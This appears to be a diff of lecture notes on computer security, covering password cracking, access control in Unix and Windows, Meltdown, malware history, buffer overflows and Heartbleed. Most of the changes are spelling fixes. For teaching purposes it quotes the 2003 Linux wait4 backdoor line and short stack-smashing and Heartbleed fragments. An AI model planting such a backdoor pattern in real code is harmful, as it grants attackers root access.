- This is trying possible passwords and seeing if we have a hash collision with the password list - This is trying possible passwords and seeing if we have a hash collision with the password list
- Usually done via brute force however difficulty is $\{char\space count\}^{length}$ - Usually done via brute force however difficulty is $\{char\space count\}^{length}$
- Online: You do not have the hash, and are instead attempting to gain access to an actual login terminal - Online: You do not have the hash, and are instead attempting to gain access to an actual login terminal
- Online is usually atempted via phising - Online is usually attempted via phishing
![1645468857.png](img/1645468857.png) ![1645468857.png](img/1645468857.png)
##### Dictionary Attacks ##### Dictionary Attacks
- Most password cracking is now achieved using **dictionary attacks** rather than brute force - Most password cracking is now achieved using **dictionary attacks** rather than brute force
- Using a dictionary of common words and passwords - Using a dictionary of common words and passwords
- Apply small variations to this list, trying them all - Apply small variations to this list, trying them all
- Combine words from two different lists - Combine words from two different lists
- `qwerty1234password1` is unbreakable using brute force, but won’t last against a dictionary attack - `qwerty1234password1` is unbreakable using brute force, but won’t last against a dictionary attack
##### Password Salting ##### Password Salting
- We can improve security by pre-pending a random *salt* to a password before hashing - We can improve security by pre-pending a random *salt* to a password before hashing
- The salt is stored unencrpted with the hash - The salt is stored unencrypted with the hash
- If a hacker has a list of hashed passwords, and three of them are the same, he can summise they’re all a common password. - If a hacker has a list of hashed passwords, and three of them are the same, he can surmise they’re all a common password.
- Salting adds non-secrete randomness to passwords - Salting adds non-secret randomness to passwords
![1645469711.png](img/1645469711.png) ![1645469711.png](img/1645469711.png)
- If we use a different random salt for each user, we get the following security benefits: - If we use a different random salt for each user, we get the following security benefits:
1. Cracking multiple passwords is slower - a hit is for a single user, not all users with that password 1. Cracking multiple passwords is slower - a hit is for a single user, not all users with that password
2. Prevents **rainbow table** attacks - we can’t pre-compute that many password combinations 2. Prevents **rainbow table** attacks - we can’t pre-compute that many password combinations
- Salting has no effect on the speed of cracking a single password - Salting has no effect on the speed of cracking a single password
#### Hashing Speed #### Hashing Speed
- When password cracking, the most important factor is *hashing speed* - When password cracking, the most important factor is *hashing speed*
- New algorithms take longer - New algorithms take longer
- Partly because they’re more complex - Partly because they’re more complex
- But some have been specifically designed to take a while - But some have been specifically designed to take a while
- Iterate to increase complexity - Iterate to increase complexity
##### Social Cracking ##### Social Cracking
+47 -48
View File
@@ -4,18 +4,18 @@ The reference monitor is an abstract concept
> An access control concept that refers to an abstract machine that mediates all access to objects by subjects > An access control concept that refers to an abstract machine that mediates all access to objects by subjects
- Must be tamper proof - Must be tamper-proof
- Must *always be invoked* when access to an object is required - Must *always be invoked* when access to an object is required
- Must be small enough to be verifiable / subject to analysis to ensure correctness - Must be small enough to be verifiable / subject to analysis to ensure correctness
##### Placement ##### Placement
- Can be placed anywhere within the system - Can be placed anywhere within the system
- Hardware - dedicated registers for defining privileges - Hardware - dedicated registers for defining privileges
- Operating system kernel - virtual machine hyper-visor - Operating system kernel - virtual machine hypervisor
- Operating system - Windows security reference monitor - Operating system - Windows security reference monitor
- Services layer - `JVM`, `.NET` - Services layer - `JVM`, `.NET`
- Application layer - Firewalls - Application layer - Firewalls
Reference monitors could be placed in a variety of locations relative to the program being run Reference monitors could be placed in a variety of locations relative to the program being run
@@ -26,27 +26,27 @@ The last example where the program contains its own reference monitor, as found
###### Lower is better ###### Lower is better
- Using a reference monitor or other security features at a lower level means: - Using a reference monitor or other security features at a lower level means:
- We can **assure** a higher degree of security - We can **assure** a higher degree of security
- Usually **simple structures** to implement - Usually **simple structures** to implement
- Reduced performance **overheads** - Reduced performance **overheads**
- Has to be extremely quick as many calls will be made - Has to be extremely quick as many calls will be made
- Fewer layer below attack possibilities - Fewer layer below attack possibilities
- However - However
- Access control decisions are far removed from applications - Access control decisions are far removed from applications
#### OS Integrity #### OS Integrity
- The operating system - The operating system
- Arbitrates access requests - Arbitrates access requests
- Is itself a resource that must be accessed - Is itself a resource that must be accessed
- This is a conflict, we want to use the OS but not mess with it - This is a conflict, we want to use the OS but not mess with it
> Users must not be able to modify the operating system > Users must not be able to modify the operating system
- Modes of operation - Modes of operation
- Defines which actions are permitted in which mode e.g. system calls, machine instructions, I/O - Defines which actions are permitted in which mode e.g. system calls, machine instructions, I/O
- Controlled Invocation - Controlled Invocation
- Allows us to execute privileged instructions safely, before returning to user code - Allows us to execute privileged instructions safely, before returning to user code
We must distinguish computations done on behalf of: We must distinguish computations done on behalf of:
@@ -61,10 +61,10 @@ In practice, Windows and Unix only use Ring 0&3 to save on overhead
### Controlled Invocation ### Controlled Invocation
- Many functions are helf at kernel level, but are quite reasonably called from within user level code - Many functions are held at kernel level, but are quite reasonably called from within user-level code
- Network and File IO - Network and File IO
- Memory allocation - Memory allocation
- Halting the CPU (at shutdown only) - Halting the CPU (at shutdown only)
- We need a mechanism to transfer safely between kernel mode (ring 0) and user mode (ring 3) - We need a mechanism to transfer safely between kernel mode (ring 0) and user mode (ring 3)
> We don’t actually perform privileged operations, we asking the operating system to perform them for us - The operating system can refuse to do it > We don’t actually perform privileged operations, we asking the operating system to perform them for us - The operating system can refuse to do it
@@ -72,7 +72,7 @@ In practice, Windows and Unix only use Ring 0&3 to save on overhead
##### Interrupts ##### Interrupts
- Exceptions or Interrupts - Exceptions or Interrupts
- In many ways is the hardware equivalent to a software exception - not always bad - In many ways is the hardware equivalent to a software exception - not always bad
- Handled by an interrupt handler which resolves the issue and returns to the original code - Handled by an interrupt handler which resolves the issue and returns to the original code
Processing an Interrupt Processing an Interrupt
@@ -85,9 +85,9 @@ Processing an Interrupt
- Descriptors hold information on crucial system objects like kernel structure locations - Descriptors hold information on crucial system objects like kernel structure locations
- Descriptors are held in descriptor tables - Descriptors are held in descriptor tables
- Contain a Descriptor Privilege Level (DPL) - Contain a Descriptor Privilege Level (DPL)
- Descriptors are indexed by selectors - Descriptors are indexed by selectors
- Loaded when required (jump calls) - Loaded when required (jump calls)
- The CPU protects the kernel by checking the Current Privilege Level (CPL) when a Selector is loaded - The CPU protects the kernel by checking the Current Privilege Level (CPL) when a Selector is loaded
##### Interrupt Gates ##### Interrupt Gates
@@ -101,11 +101,11 @@ Processing an Interrupt
###### Modern Kernels ###### Modern Kernels
- Intel introduced the `sysenter` and `sysexit` operations with the Pentium II - Intel introduced the `sysenter` and `sysexit` operations with the Pentium II
- performs with much less overhead - performs with much less overhead
![1645472755.png](img/1645472755.png) ![1645472755.png](img/1645472755.png)
We got immediately in to ring 0 We go immediately into ring 0
However where we go next is dictated by the `sysenter` pointer, users cannot write to `sysenter` However where we go next is dictated by the `sysenter` pointer, users cannot write to `sysenter`
@@ -119,20 +119,20 @@ However where we go next is dictated by the `sysenter` pointer, users cannot wri
- A process is a program being executed currently - A process is a program being executed currently
- Important unit of control - Important unit of control
- Exists in its own address space - Exists in its own address space
- Communicates with other processes via the OS - Communicates with other processes via the OS
- Separation for security - Separation for security
- A thread is a strand of execution within a process - A thread is a strand of execution within a process
- Share a common address space - Share a common address space
- Segmentation - divides data into logical units - Segmentation - divides data into logical units
- Good for security - Good for security
- Challenging memory management - Challenging memory management
- Not used much in modern OSs - Not used much in modern OSs
- Modern OSs only have two segments, one for user space, the other for kernel space - Modern OSs only have two segments, one for user space, the other for kernel space
- Paging - divides memory into pages of equal size - Paging - divides memory into pages of equal size
- Efficient memory management - Efficient memory management
- Less good for access control - Less good for access control
- Extremely common in modern OSs - Extremely common in modern OSs
##### Page Tables ##### Page Tables
@@ -144,17 +144,17 @@ However where we go next is dictated by the `sysenter` pointer, users cannot wri
###### Meltdown ###### Meltdown
- In most operating systems, the entire kernel is stored in the upper address space - In most operating systems, the entire kernel is stored in the upper address space
- Pages in this area are flagged as supervisor, and cannot be access outside ring 0 - Pages in this area are flagged as supervisor, and cannot be accessed outside ring 0
- Meltdown is an exploit that allows us to read this privileged memory - Meltdown is an exploit that allows us to read this privileged memory
- We do this using a *side-channel* - We do this using a *side-channel*
![1645474135.png](img/1645474135.png) ![1645474135.png](img/1645474135.png)
- In Intel CPUs, it’s common to speculatively evaluate code prior reaching it - In Intel CPUs, it’s common to speculatively evaluate code prior to reaching it
- E.g. conditionals - E.g. conditionals
- **Significant** speed up - **Significant** speed-up
- No harm done, changes are just rolled back - No harm done, changes are just rolled back
- But the **cache isn’t rolled back** - But the **cache isn’t rolled back**
- This is called side-channelling and cache timing - This is called side-channelling and cache timing
```java ```java
@@ -179,8 +179,7 @@ x = memory[data * 4096];
4. Page 117 was quicker 4. Page 117 was quicker
- Meltdown attempts to read a value from kernel memory - Meltdown attempts to read a value from kernel memory
- Read from kernel - Read from kernel
- Mask out single bit - Mask out single bit
- Access user memory at that location - Access user memory at that location
- If we repeat we can read all memory in kernel space - If we repeat we can read all memory in kernel space
+33 -34
View File
@@ -4,23 +4,23 @@
- Identification - Identification
- Authentication - Authentication
- Lets us verify who we are to the system - Lets us verify who we are to the system
- Some files are private, some are public - Some files are private, some are public
- System files must be protected - System files must be protected
- We need to be able to access applications - We need to be able to access applications
- Access control - Access control
- Auditing - Auditing
#### Authentication & Authorisation #### Authentication & Authorisation
- Subject / Principle - an active entity - Subject / Principal - an active entity
- Object - resource being accessed - Object - resource being accessed
- Access operation - Access operation
- Reference monitor - grants or denies access - Reference monitor - grants or denies access
![1645720842.png](img/1645720842.png) ![1645720842.png](img/1645720842.png)
**Principle** **Principal**
> “An entity that can be granted access to objects or can make statements affecting access control decisions” > “An entity that can be granted access to objects or can make statements affecting access control decisions”
@@ -39,32 +39,32 @@
Files or resources - memory, printers, directories Files or resources - memory, printers, directories
- Two options for focusing control: - Two options for focusing control:
1. What a subject is allowed to do 1. What a subject is allowed to do
2. What may be done to an object 2. What may be done to an object
#### General Model #### General Model
- We’ll settle on some common access files: - We’ll settle on some common access files:
- **Read** - Simply viewing (**confidentiality**) - **Read** - Simply viewing (**confidentiality**)
- **Write** - Includes changing, appending, deleting (**integrity**) - **Write** - Includes changing, appending, deleting (**integrity**)
- **Execute** - Can run a file without knowing its contents - **Execute** - Can run a file without knowing its contents
##### Ownership ##### Ownership
- Who is in charge of setting security policies - Who is in charge of setting security policies
- **Discretionary**: Owner can be defined for each resource - **Discretionary**: Owner can be defined for each resource
- Owner controls who gets access - Owner controls who gets access
- **Mandatory**: There could be a system-wide policy - **Mandatory**: There could be a system-wide policy
- e.g. a government with different levels of security (top secret, level 3 clearance, etc) - e.g. a government with different levels of security (top secret, level 3 clearance, etc)
- Not commonly used for businesses - Not commonly used for businesses
- Most OS’s support the concept of ownership - Most OSs support the concept of ownership
### Unix ### Unix
- Unix simplifies access control by considering only the *user*, *group* and *others* - Unix simplifies access control by considering only the *user*, *group* and *others*
- User is the current owner - User is the current owner
- Group is the named group entity - Group is the named group entity
- Everyone else - Everyone else
- Unix offers read, write and execute access controls - Unix offers read, write and execute access controls
##### Groups ##### Groups
@@ -76,23 +76,23 @@ Files or resources - memory, printers, directories
##### UID & GID ##### UID & GID
- Usernames in unix are soft aliases, your UID is what determines permissions - Usernames in Unix are soft aliases; your UID is what determines permissions
- User identities: UID - User identities: UID
- Group identities: GID - Group identities: GID
- Your IDs are stored in `/etc/passwd` - Your IDs are stored in `/etc/passwd`
- This stores user accounts, not just passwords - This stores user accounts, not just passwords
- Root has a special UID of 0 - Root has a special UID of 0
###### The Shadow File ###### The Shadow File
- In an attempt to improve password security, we can store password hashes in a shadow file - In an attempt to improve password security, we can store password hashes in a shadow file
- Readable only by root users - Readable only by root users
- `/etc/shadow` stores the hashed passwords needed to authenticate users - `/etc/shadow` stores the hashed passwords needed to authenticate users
#### Root (Unix Superuser) #### Root (Unix Superuser)
- Root’s UID 0 is actually hard coded into the Linux kernel at multiple points - Root’s UID 0 is actually hard coded into the Linux kernel at multiple points
- In 2003, this anonymous change was made to the error value return in the `wait4` function is Linux: - In 2003, this anonymous change was made to the error value return in the `wait4` function in Linux:
``` ```
if ((options == (_WCLONE|__WALL)) && (current->uid = 0)) if ((options == (_WCLONE|__WALL)) && (current->uid = 0))
@@ -107,15 +107,15 @@ Note: single `=`. This was a backdoor which sets the current uid to 0, giving ro
- Separate superuser duties (e.g. daemon, uucp) - Separate superuser duties (e.g. daemon, uucp)
- Never use root as normal user - Never use root as normal user
- Audit `su` and `sudo` usage - Audit `su` and `sudo` usage
- In unix, everything is a file - In Unix, everything is a file
- Files really represent resources - Files really represent resources
- Organised in a tree structure, with alterations depending on the file system - Organised in a tree structure, with alterations depending on the file system
- I-nodes store permission information - I-nodes store permission information
- Every resource as a owner and a group - Every resource has an owner and a group
###### I-nodes ###### I-nodes
- I-nodes in unix store the metadata for files - I-nodes in Unix store the metadata for files
- Each file name links to an i-node which stores security information - Each file name links to an i-node which stores security information
``` ```
@@ -135,9 +135,9 @@ Change: 2022-02-11 21:26:48.260535505 +0000
- Every resource has permission bits - held in the i-node metadata - Every resource has permission bits - held in the i-node metadata
- Permissions for the user / group / others - Permissions for the user / group / others
- Octal representation - Octal representation
- Bit 3: read - Bit 3: read
- Bit 2: write - Bit 2: write
- Bit 1: execute - Bit 1: execute
- Permissions are changed using `chmod` and passing three octal values - Permissions are changed using `chmod` and passing three octal values
![1645722860.png](img/1645722860.png) ![1645722860.png](img/1645722860.png)
@@ -155,11 +155,10 @@ Directory permissions are slightly different to files:
### Linux Security Modules ### Linux Security Modules
- SInce 2.6, linux provides the ability to hook into security calls - Since 2.6, Linux provides the ability to hook into security calls
- This adds the ability to perform more complex Mandatory Access Control after standard Unix DAC - This adds the ability to perform more complex Mandatory Access Control after standard Unix DAC
- DAC check happens irrespective of whether SM is operationa. - DAC check happens irrespective of whether SM is operational.
![1645723378.png](img/1645723378.png) ![1645723378.png](img/1645723378.png)
- If the security module fails, it does not matter as the discretionary access check has already run. - If the security module fails, it does not matter as the discretionary access check has already run.
+48 -48
View File
@@ -4,33 +4,33 @@ Windows Architecture
![1646408037.png](img/1646408037.png) ![1646408037.png](img/1646408037.png)
Note: windows has `kernel mode drivers` and `user mode drivers` Note: Windows has `kernel mode drivers` and `user mode drivers`
### Security Subsystem ### Security Subsystem
- Runs in user mode - Runs in user mode
- `Logon` processes (`winlogon`, `LogonUI`) - `Logon` processes (`winlogon`, `LogonUI`)
- Local security authority (`LSA`) - Local security authority (`LSA`)
- Checks Users accounts - Checks users’ accounts
- Provides access token - Provides access token
- Responsible for auditing - Responsible for auditing
- Security Account manager (`SAM`) - Security Account manager (`SAM`)
- Maintains user account database used by `LSA` - Maintains user account database used by `LSA`
- Encrypts / hashes passwords - Encrypts / hashes passwords
- Windows predominantly uses **Access Control Lists**, and has done since Windows NT - Windows predominantly uses **Access Control Lists**, and has done since Windows NT
- Extends the usual read, write and execute with: - Extends the usual read, write and execute with:
- Take ownership - Take ownership
- Change permissions - Change permissions
- Delete - Delete
- This allows finer control over files for example a user will be able to read a file but not delete it - This allows finer control over files for example a user will be able to read a file but not delete it
- 32-bit access masks (unlike Unix’s 9 bits) - 32-bit access masks (unlike Unix’s 9 bits)
- A higher degree of control, with the associated complexity increase - A higher degree of control, with the associated complexity increase
### Access Control Matrix ### Access Control Matrix
- Access rights are defined individually for each combination of subject and object - Access rights are defined individually for each combination of subject and object
- Quite an abstract concept, bit would allow for very fine grained control - Quite an abstract concept, but would allow for very fine-grained control
- Not practical, think of the memory required in scaling it up - Not practical, think of the memory required in scaling it up
![1646409469.png](img/1646409469.png) ![1646409469.png](img/1646409469.png)
@@ -52,41 +52,41 @@ The access control list can be found by right clicking on a file -> properties -
### Access Control ### Access Control
- Access control in windows treats more than just files, also: - Access control in Windows treats more than just files, also:
- Registry keys - Registry keys
- Active directory objects - Active directory objects
- Groups - Groups
- Inheritance is implemented - Inheritance is implemented
- File can inherit ACLs from parent directories - File can inherit ACLs from parent directories
#### Principles #### Principals
- Principles are more broadly defined as well: - Principals are more broadly defined as well:
- Local users - Local users
- Domain users - Domain users
- Groups - Groups
- Machines - Machines
Each principles has a human readable name and security ID (`SID`) Each principal has a human-readable name and security ID (`SID`)
``` ```
S-1-5-21-2475811070-2421845406-3333283485-1005 S-1-5-21-2475811070-2421845406-3333283485-1005
S-1-5-21-1664130791-3153540899-3044996548-279530 S-1-5-21-1664130791-3153540899-3044996548-279530
``` ```
These are examples of `SID` from windows, but why are they so long? These are examples of `SID` from Windows, but why are they so long?
This is a form of future proofing. Imagine company A buys company B, you can merge the users onto one active directory without two `SID`s clashing. (also 96 bits of memory isn’t a lot in the grand scheme of things) This is a form of future proofing. Imagine company A buys company B, you can merge the users onto one active directory without two `SID`s clashing. (also 96 bits of memory isn’t a lot in the grand scheme of things)
##### Local / Domain Principles ##### Local / Domain Principals
- LSA creates local principles - LSA creates local principals
- principle = `MACHINE\principal` - principal = `MACHINE\principal`
- Domain principles adminstered on DC by domain admins - Domain principals administered on DC by domain admins
- principle@domain = DOMAIN\principle - principal@domain = DOMAIN\principal
- net user /domain - net user /domain
- net group /domain - net group /domain
- net localgroup /domain - net localgroup /domain
#### Groups #### Groups
@@ -99,16 +99,16 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
#### Objects #### Objects
- Objects are passive entities in access operations - Objects are passive entities in access operations
- In windows: - In Windows:
- Executive objects (processes, threads, etc) - Executive objects (processes, threads, etc)
- Private objects (files, directories) - Private objects (files, directories)
- Securable objects have a security descriptor - Securable objects have a security descriptor
- Built-in securable objects managed by the OS - Built-in securable objects managed by the OS
- Private objects managed by the application software - Private objects managed by the application software
### Access Tokens ### Access Tokens
- Instead of passing a number as in linux, we pass an access token - Instead of passing a number as in Linux, we pass an access token
- It is the security credentials for a login session stored in the **access token** - It is the security credentials for a login session stored in the **access token**
- Identifies the user, the user’s groups, and the user’s privileges - Identifies the user, the user’s groups, and the user’s privileges
@@ -116,33 +116,33 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
- Windows subjects: Processes and threads - Windows subjects: Processes and threads
- New processes get a **copy** of the parent access token, possibly modified - New processes get a **copy** of the parent access token, possibly modified
- Individual access token are immutable and can live beyond policy changes - Individual access tokens are immutable and can live beyond policy changes
- The access token checked is the one given at login, not the current access token - The access token checked is the one given at login, not the current access token
- This is a TOCTTOU issue (Time-of-check to Time-of-use) - This is a TOCTTOU issue (Time-of-check to Time-of-use)
- Admins can force a user to logoff to update their access token - Admins can force a user to log off to update their access token
### User Account Control ### User Account Control
- After Vista, administrator users do not use an administrative access token by default - After Vista, administrator users do not use an administrative access token by default
- Users have two tokens, one heavily restricted and used by default - Users have two tokens, one heavily restricted and used by default
- A prompt allows a user to spawn a process with the adminstrative token, or switch a process’ token. - A prompt allows a user to spawn a process with the administrative token, or switch a process’ token.
- Similar to `sudo` - Similar to `sudo`
- Can be swapped mid-execution - Can be swapped mid-execution
#### Domains #### Domains
- Single sing-on for network resources - Single sign-on for network resources
- Centralised security administration - Centralised security administration
- Domain controller (DC) - Domain controller (DC)
- Handles user accounts and access control - Handles user accounts and access control
- Trusted 3rd party for authentication - Trusted 3rd party for authentication
- Multiple DCs allow for decentralisation by design - Multiple DCs allow for decentralisation by design
#### Interactive Logon #### Interactive Logon
- The windows interactive logon allows a user to authenticate - The Windows interactive logon allows a user to authenticate
- Windows logon begins with the Secure Attention Sequence `Ctrl+Alt+Del` - Windows logon begins with the Secure Attention Sequence `Ctrl+Alt+Del`
- Can prevent spoofing - is tied directly to `winlogon` - Can prevent spoofing - is tied directly to `winlogon`
- The logon process differs slightly for local and domain authentication - The logon process differs slightly for local and domain authentication
##### Local Logon ##### Local Logon
@@ -150,7 +150,7 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
1. `Ctrl+Alt+Del` initiates a login prompt using `GINA` 1. `Ctrl+Alt+Del` initiates a login prompt using `GINA`
2. These collect credentials which are passed to the `LSA` 2. These collect credentials which are passed to the `LSA`
3. The `LSA` uses `NTLM` to check the credentials against the `SAM` database 3. The `LSA` uses `NTLM` to check the credentials against the `SAM` database
4. Successful login an access token, which is used to spawn a shell (explorer.exe) 4. Successful login produces an access token, which is used to spawn a shell (explorer.exe)
![1646411476.png](img/1646411476.png) ![1646411476.png](img/1646411476.png)
+43 -43
View File
@@ -3,8 +3,8 @@
**Malware** - **Mal**icious Soft**ware** **Malware** - **Mal**icious Soft**ware**
- A very general term, malware is usually categorised based on - A very general term, malware is usually categorised based on
- How it proliferates - How it proliferates
- What it does - What it does
![1646673601.png](img/1646673601.png) ![1646673601.png](img/1646673601.png)
@@ -20,19 +20,19 @@
- Payloads are the actual malware deposited on the machine, or the harmful results - Payloads are the actual malware deposited on the machine, or the harmful results
- They range in severity - They range in severity
- Essentially do nothing - Essentially do nothing
- Messages and adverts - Messages and adverts
- Recruited into botnets or mail spam - Recruited into botnets or mail spam
- Stealing private information - Stealing private information
- System destruction - System destruction
- Ransomware & Crypto-jacking - Ransomware & Crypto-jacking
#### Virus #### Virus
- A piece of self-replicating code - A piece of self-replicating code
- Propagates by attaching itself to a disk, file or document - Propagates by attaching itself to a disk, file or document
- When the file is run, the virus runs and attempts to proliferate - When the file is run, the virus runs and attempts to proliferate
- Installs without the users knowledge or consent - Installs without the user’s knowledge or consent
##### Notable Viruses ##### Notable Viruses
@@ -40,38 +40,38 @@
- 1986: `Brain`, the first MS-DOS computer virus - 1986: `Brain`, the first MS-DOS computer virus
- 1989: `Ghostball`, the first multipartite virus - affects both `exe`s and the boot sector - 1989: `Ghostball`, the first multipartite virus - affects both `exe`s and the boot sector
- 1995: First macro virus, `Concept`, affects MS Word documents - 1995: First macro virus, `Concept`, affects MS Word documents
- 1996: First linux virus, `Staog`, uses bugs in the linux kernel - 1996: First Linux virus, `Staog`, uses bugs in the Linux kernel
#### Worms #### Worms
- Viruses traditionally require a human to spread - Viruses traditionally require a human to spread
- Worms are self-replicating and stand-alone programs - Worms are self-replicating and stand-alone programs
- Do not require human intervention - Do not require human intervention
- Scanning worms or email worms - Scanning worms or email worms
- Exploit known software vulnerabilities in order to spread - Exploit known software vulnerabilities in order to spread
##### Notable Worms ##### Notable Worms
- 1988: The Morris Worm, affects BSD unix machines. One of the first known buffer overruns - 1988: The Morris Worm, affects BSD Unix machines. One of the first known buffer overruns
- 2000: The `ILOVEYOU` worm, one of the most damaging worms ever, used social engineering to get people to install it. - 2000: The `ILOVEYOU` worm, one of the most damaging worms ever, used social engineering to get people to install it.
- Used the file name `LOVE-LETTER-FOR-YOU.txt.vbs` as windows didn’t show the file type in the file name - Used the file name `LOVE-LETTER-FOR-YOU.txt.vbs` as Windows didn’t show the file type in the file name
![1646674683.png](img/1646674683.png) ![1646674683.png](img/1646674683.png)
### 2003-2004 ### 2003-2004
- During 2003 and 2004 worms were everywhere - During 2003 and 2004 worms were everywhere
- SQL Slammer - fastest spreading worm, crashed the internet (only 376 bytes or 1 UDP packet) - SQL Slammer - fastest spreading worm, crashed the internet (only 376 bytes or 1 UDP packet)
- Even when the network was crippled, the occasional UDP packet could be transmitted and further damage the network - Even when the network was crippled, the occasional UDP packet could be transmitted and further damage the network
- MS Blaster - Windows XP mainly, crashes RPC and reboots your machine - MS Blaster - Windows XP mainly, crashes RPC and reboots your machine
- Spreading between machines on a internal network easily, no port filtering - Spreading between machines on an internal network easily, no port filtering
- Used a buffer overflow in a windows Remote Procedure Call (RPC) service - spreads without the user clicking - Used a buffer overflow in a Windows Remote Procedure Call (RPC) service - spreads without the user clicking
- Compromised machines performed DDOS on `windowsupdate.com` - Compromised machines performed DDOS on `windowsupdate.com`
- Netsky - Infected email attachment, actually removed other worms as part of a *worm war* - Netsky - Infected email attachment, actually removed other worms as part of a *worm war*
- Sasser - From the author of Netsky, attacks windows `LSASS` - Sasser - From the author of Netsky, attacks Windows `LSASS`
- Spread 17 days after a patch to the vulnerability was released by Microsoft - Spread 17 days after a patch to the vulnerability was released by Microsoft
- Buffer overflow in the Local Security and Authority Subsystem Service `LSASS` - Buffer overflow in the Local Security and Authority Subsystem Service `LSASS`
- Scans IP addresses and infects via port 445 - Scans IP addresses and infects via port 445
#### Exploit Life Cycle #### Exploit Life Cycle
@@ -88,39 +88,39 @@
###### Stuxnet ###### Stuxnet
- Believed to be an American-Israeli cyber weapon - Believed to be an American-Israeli cyber weapon
1. Uses *four zero-day flaws* to infect Windows 1. Uses *four zero-day flaws* to infect Windows
2. Seeks out any instance of `Siemens Step7` 2. Seeks out any instance of `Siemens Step7`
3. Finds programmable logic controllers (PLC) 3. Finds programmable logic controllers (PLC)
4. Detects attached centrifuges and spins them to destruction 4. Detects attached centrifuges and spins them to destruction
5. Reports that the centrifuges are fine 5. Reports that the centrifuges are fine
### Trojans ### Trojans
- A malicious program pretending to be a legitimate application - A malicious program pretending to be a legitimate application
- Often obtained in email attachments or at malicious websites - Often obtained in email attachments or at malicious websites
- Don’t replicated themselves - *user error* - Don’t replicate themselves - *user error*
- Randomware is the most common form of Trojan now - Ransomware is the most common form of Trojan now
#### Notable Trojans #### Notable Trojans
- 1989: The AIDS Trojan, encrypts all files filenames on the system and request random - 1989: The AIDS Trojan, encrypts all files’ filenames on the system and requests ransom
- 2002: Beast, affects windows machines from 95-XP and provides the attack with a remote admin tool (RAT) - there are a lot of these types - 2002: Beast, affects Windows machines from 95-XP and provides the attacker with a remote admin tool (RAT) - there are a lot of these types
- 2013: Cryptolocker - massive randomware - 2013: Cryptolocker - massive ransomware
##### Ransomware ##### Ransomware
- Will usually encrypt or block access to files and demand ransom - Will usually encrypt or block access to files and demand ransom
- It is a clever solution, because if an anti-virus removes it, it is often too late - It is a clever solution, because if an anti-virus removes it, it is often too late
- Usually distributed on malicious websites, or to already infected machines - Usually distributed on malicious websites, or to already infected machines
- The file decryption keys are protected by encrpyting using the *public key of a C&C server* - The file decryption keys are protected by encrypting using the *public key of a C&C server*
###### Ransomware Variants ###### Ransomware Variants
- Most the challenge in successfully using randomware is tricking a user into running it, and bypassing anti-virus and browser protection - Most of the challenge in successfully using ransomware is tricking a user into running it, and bypassing anti-virus and browser protection
- Fake emails - Fake emails
- Malicious web pages - Malicious web pages
- Obfuscated javascript attachments - Obfuscated JavaScript attachments
- Deployed using *exploit kits* - Deployed using *exploit kits*
##### CryptoWall JS Example ##### CryptoWall JS Example
@@ -136,6 +136,6 @@
![1646676407.png](img/1646676407.png) ![1646676407.png](img/1646676407.png)
- This was exploited almost immediately - This was exploited almost immediately
- Extremely easy to use the API - Extremely easy to use the API
- Monero mining is pretty easy even on a CPU - Monero mining is pretty easy even on a CPU
- JavaScript is easy to inject onto websites via adverts - JavaScript is easy to inject onto websites via adverts
+16 -16
View File
@@ -7,9 +7,9 @@
- In C and C++, the programmer performs memory management - In C and C++, the programmer performs memory management
- Flexible, powerful, fast but dangerous - Flexible, powerful, fast but dangerous
- Buffer Overruns - Buffer Overruns
- Stack Overruns - Stack Overruns
- Heap Overruns - Heap Overruns
- Memory-managed languages avoid this, but of course may have their own vulnerabilities - Memory-managed languages avoid this, but of course may have their own vulnerabilities
### Buffer Overflows ### Buffer Overflows
@@ -51,7 +51,7 @@ void main()
###### Stack Smashing ###### Stack Smashing
- In C and C++, low level functions like `strcpy` perform no bounds checking at all - In C and C++, low level functions like `strcpy` perform no bounds checking at all
- This is partly due to the fact strings are null terminated, if we provide no null character `strcpy` will continue to run - This is partly due to the fact strings are null terminated, if we provide no null character `strcpy` will continue to run
- If `str` is long, we can write into other memory - If `str` is long, we can write into other memory
```c ```c
@@ -68,7 +68,7 @@ void function(char *str)
###### Stack Canaries ###### Stack Canaries
- Stack canaries modify the prologue and epilogue of all functions to check a value ion front of the return address is unchanged - Stack canaries modify the prologue and epilogue of all functions to check a value in front of the return address is unchanged
![1646679244.png](img/1646679244.png) ![1646679244.png](img/1646679244.png)
@@ -77,7 +77,7 @@ void function(char *str)
###### Data Execution Prevention (NX) ###### Data Execution Prevention (NX)
- Modern operating systems will mark the stack as non-executable - Modern operating systems will mark the stack as non-executable
- `NX` on AMD, `XD` on Intel and `XN` on arm - `NX` on AMD, `XD` on Intel and `XN` on ARM
- An `NX` stack means that adding in our exploit code won’t work - An `NX` stack means that adding in our exploit code won’t work
- We can circumvent this using a `return-to-libc` attack - We can circumvent this using a `return-to-libc` attack
@@ -85,12 +85,12 @@ void function(char *str)
- To defeat `ret2lib2` various `0x0` null bytes are inserted into standard library addresses - To defeat `ret2lib2` various `0x0` null bytes are inserted into standard library addresses
- Developers also restrict access to obvious system calls - Developers also restrict access to obvious system calls
- Address Space Layout Randomisation (`ASLR`) moves the address of library and programs around - Address Space Layout Randomisation (`ASLR`) moves the addresses of libraries and programs around
- They don’t have to move too much before your hand-crafted `ret` addresses will break - They don’t have to move too much before your hand-crafted `ret` addresses will break
###### Return-Oriented Programming ###### Return-Oriented Programming
- Lets forget about injecting code, how about just using existing code in the actual exploitable program - Let’s forget about injecting code, how about just using existing code in the actual exploitable program
- No individual section of this program will do what we want - No individual section of this program will do what we want
- Find short sections, *gadgets* and link them together - Find short sections, *gadgets* and link them together
@@ -109,13 +109,13 @@ void function(char *str)
##### Heartbleed ##### Heartbleed
- Heartbleed is a bug in `OpenSSL` - Heartbleed is a bug in `OpenSSL`
- Open source `SSL` library - Open source `SSL` library
- Started in `OpenBSD` - Started in `OpenBSD`
- Used almost *everywhere* - Used almost *everywhere*
- Specifically targeted the heartbeat extension - Specifically targeted the heartbeat extension
- Extension to regular `SSL` and used for keep-alive purposes, to stop quiet connections being closed - Extension to regular `SSL` and used for keep-alive purposes, to stop quiet connections being closed
- Client sends a message to the server to say it’s alive - Client sends a message to the server to say it’s alive
- Server responds (also alive) - Server responds (also alive)
![1646679952.png](img/1646679952.png) ![1646679952.png](img/1646679952.png)
@@ -142,6 +142,6 @@ if (r >= 0 && s->msg_callback)
s, s->msg_callback_arg); s, s->msg_callback_arg);
``` ```
This bug would just memcpy a bunch of the server’s ram and send it back to the client. This can expose RSA keys. This bug would just memcpy a bunch of the server’s RAM and send it back to the client. This can expose RSA keys.
This is called a **buffer overread** attack. This is called a **buffer overread** attack.
+28 -29
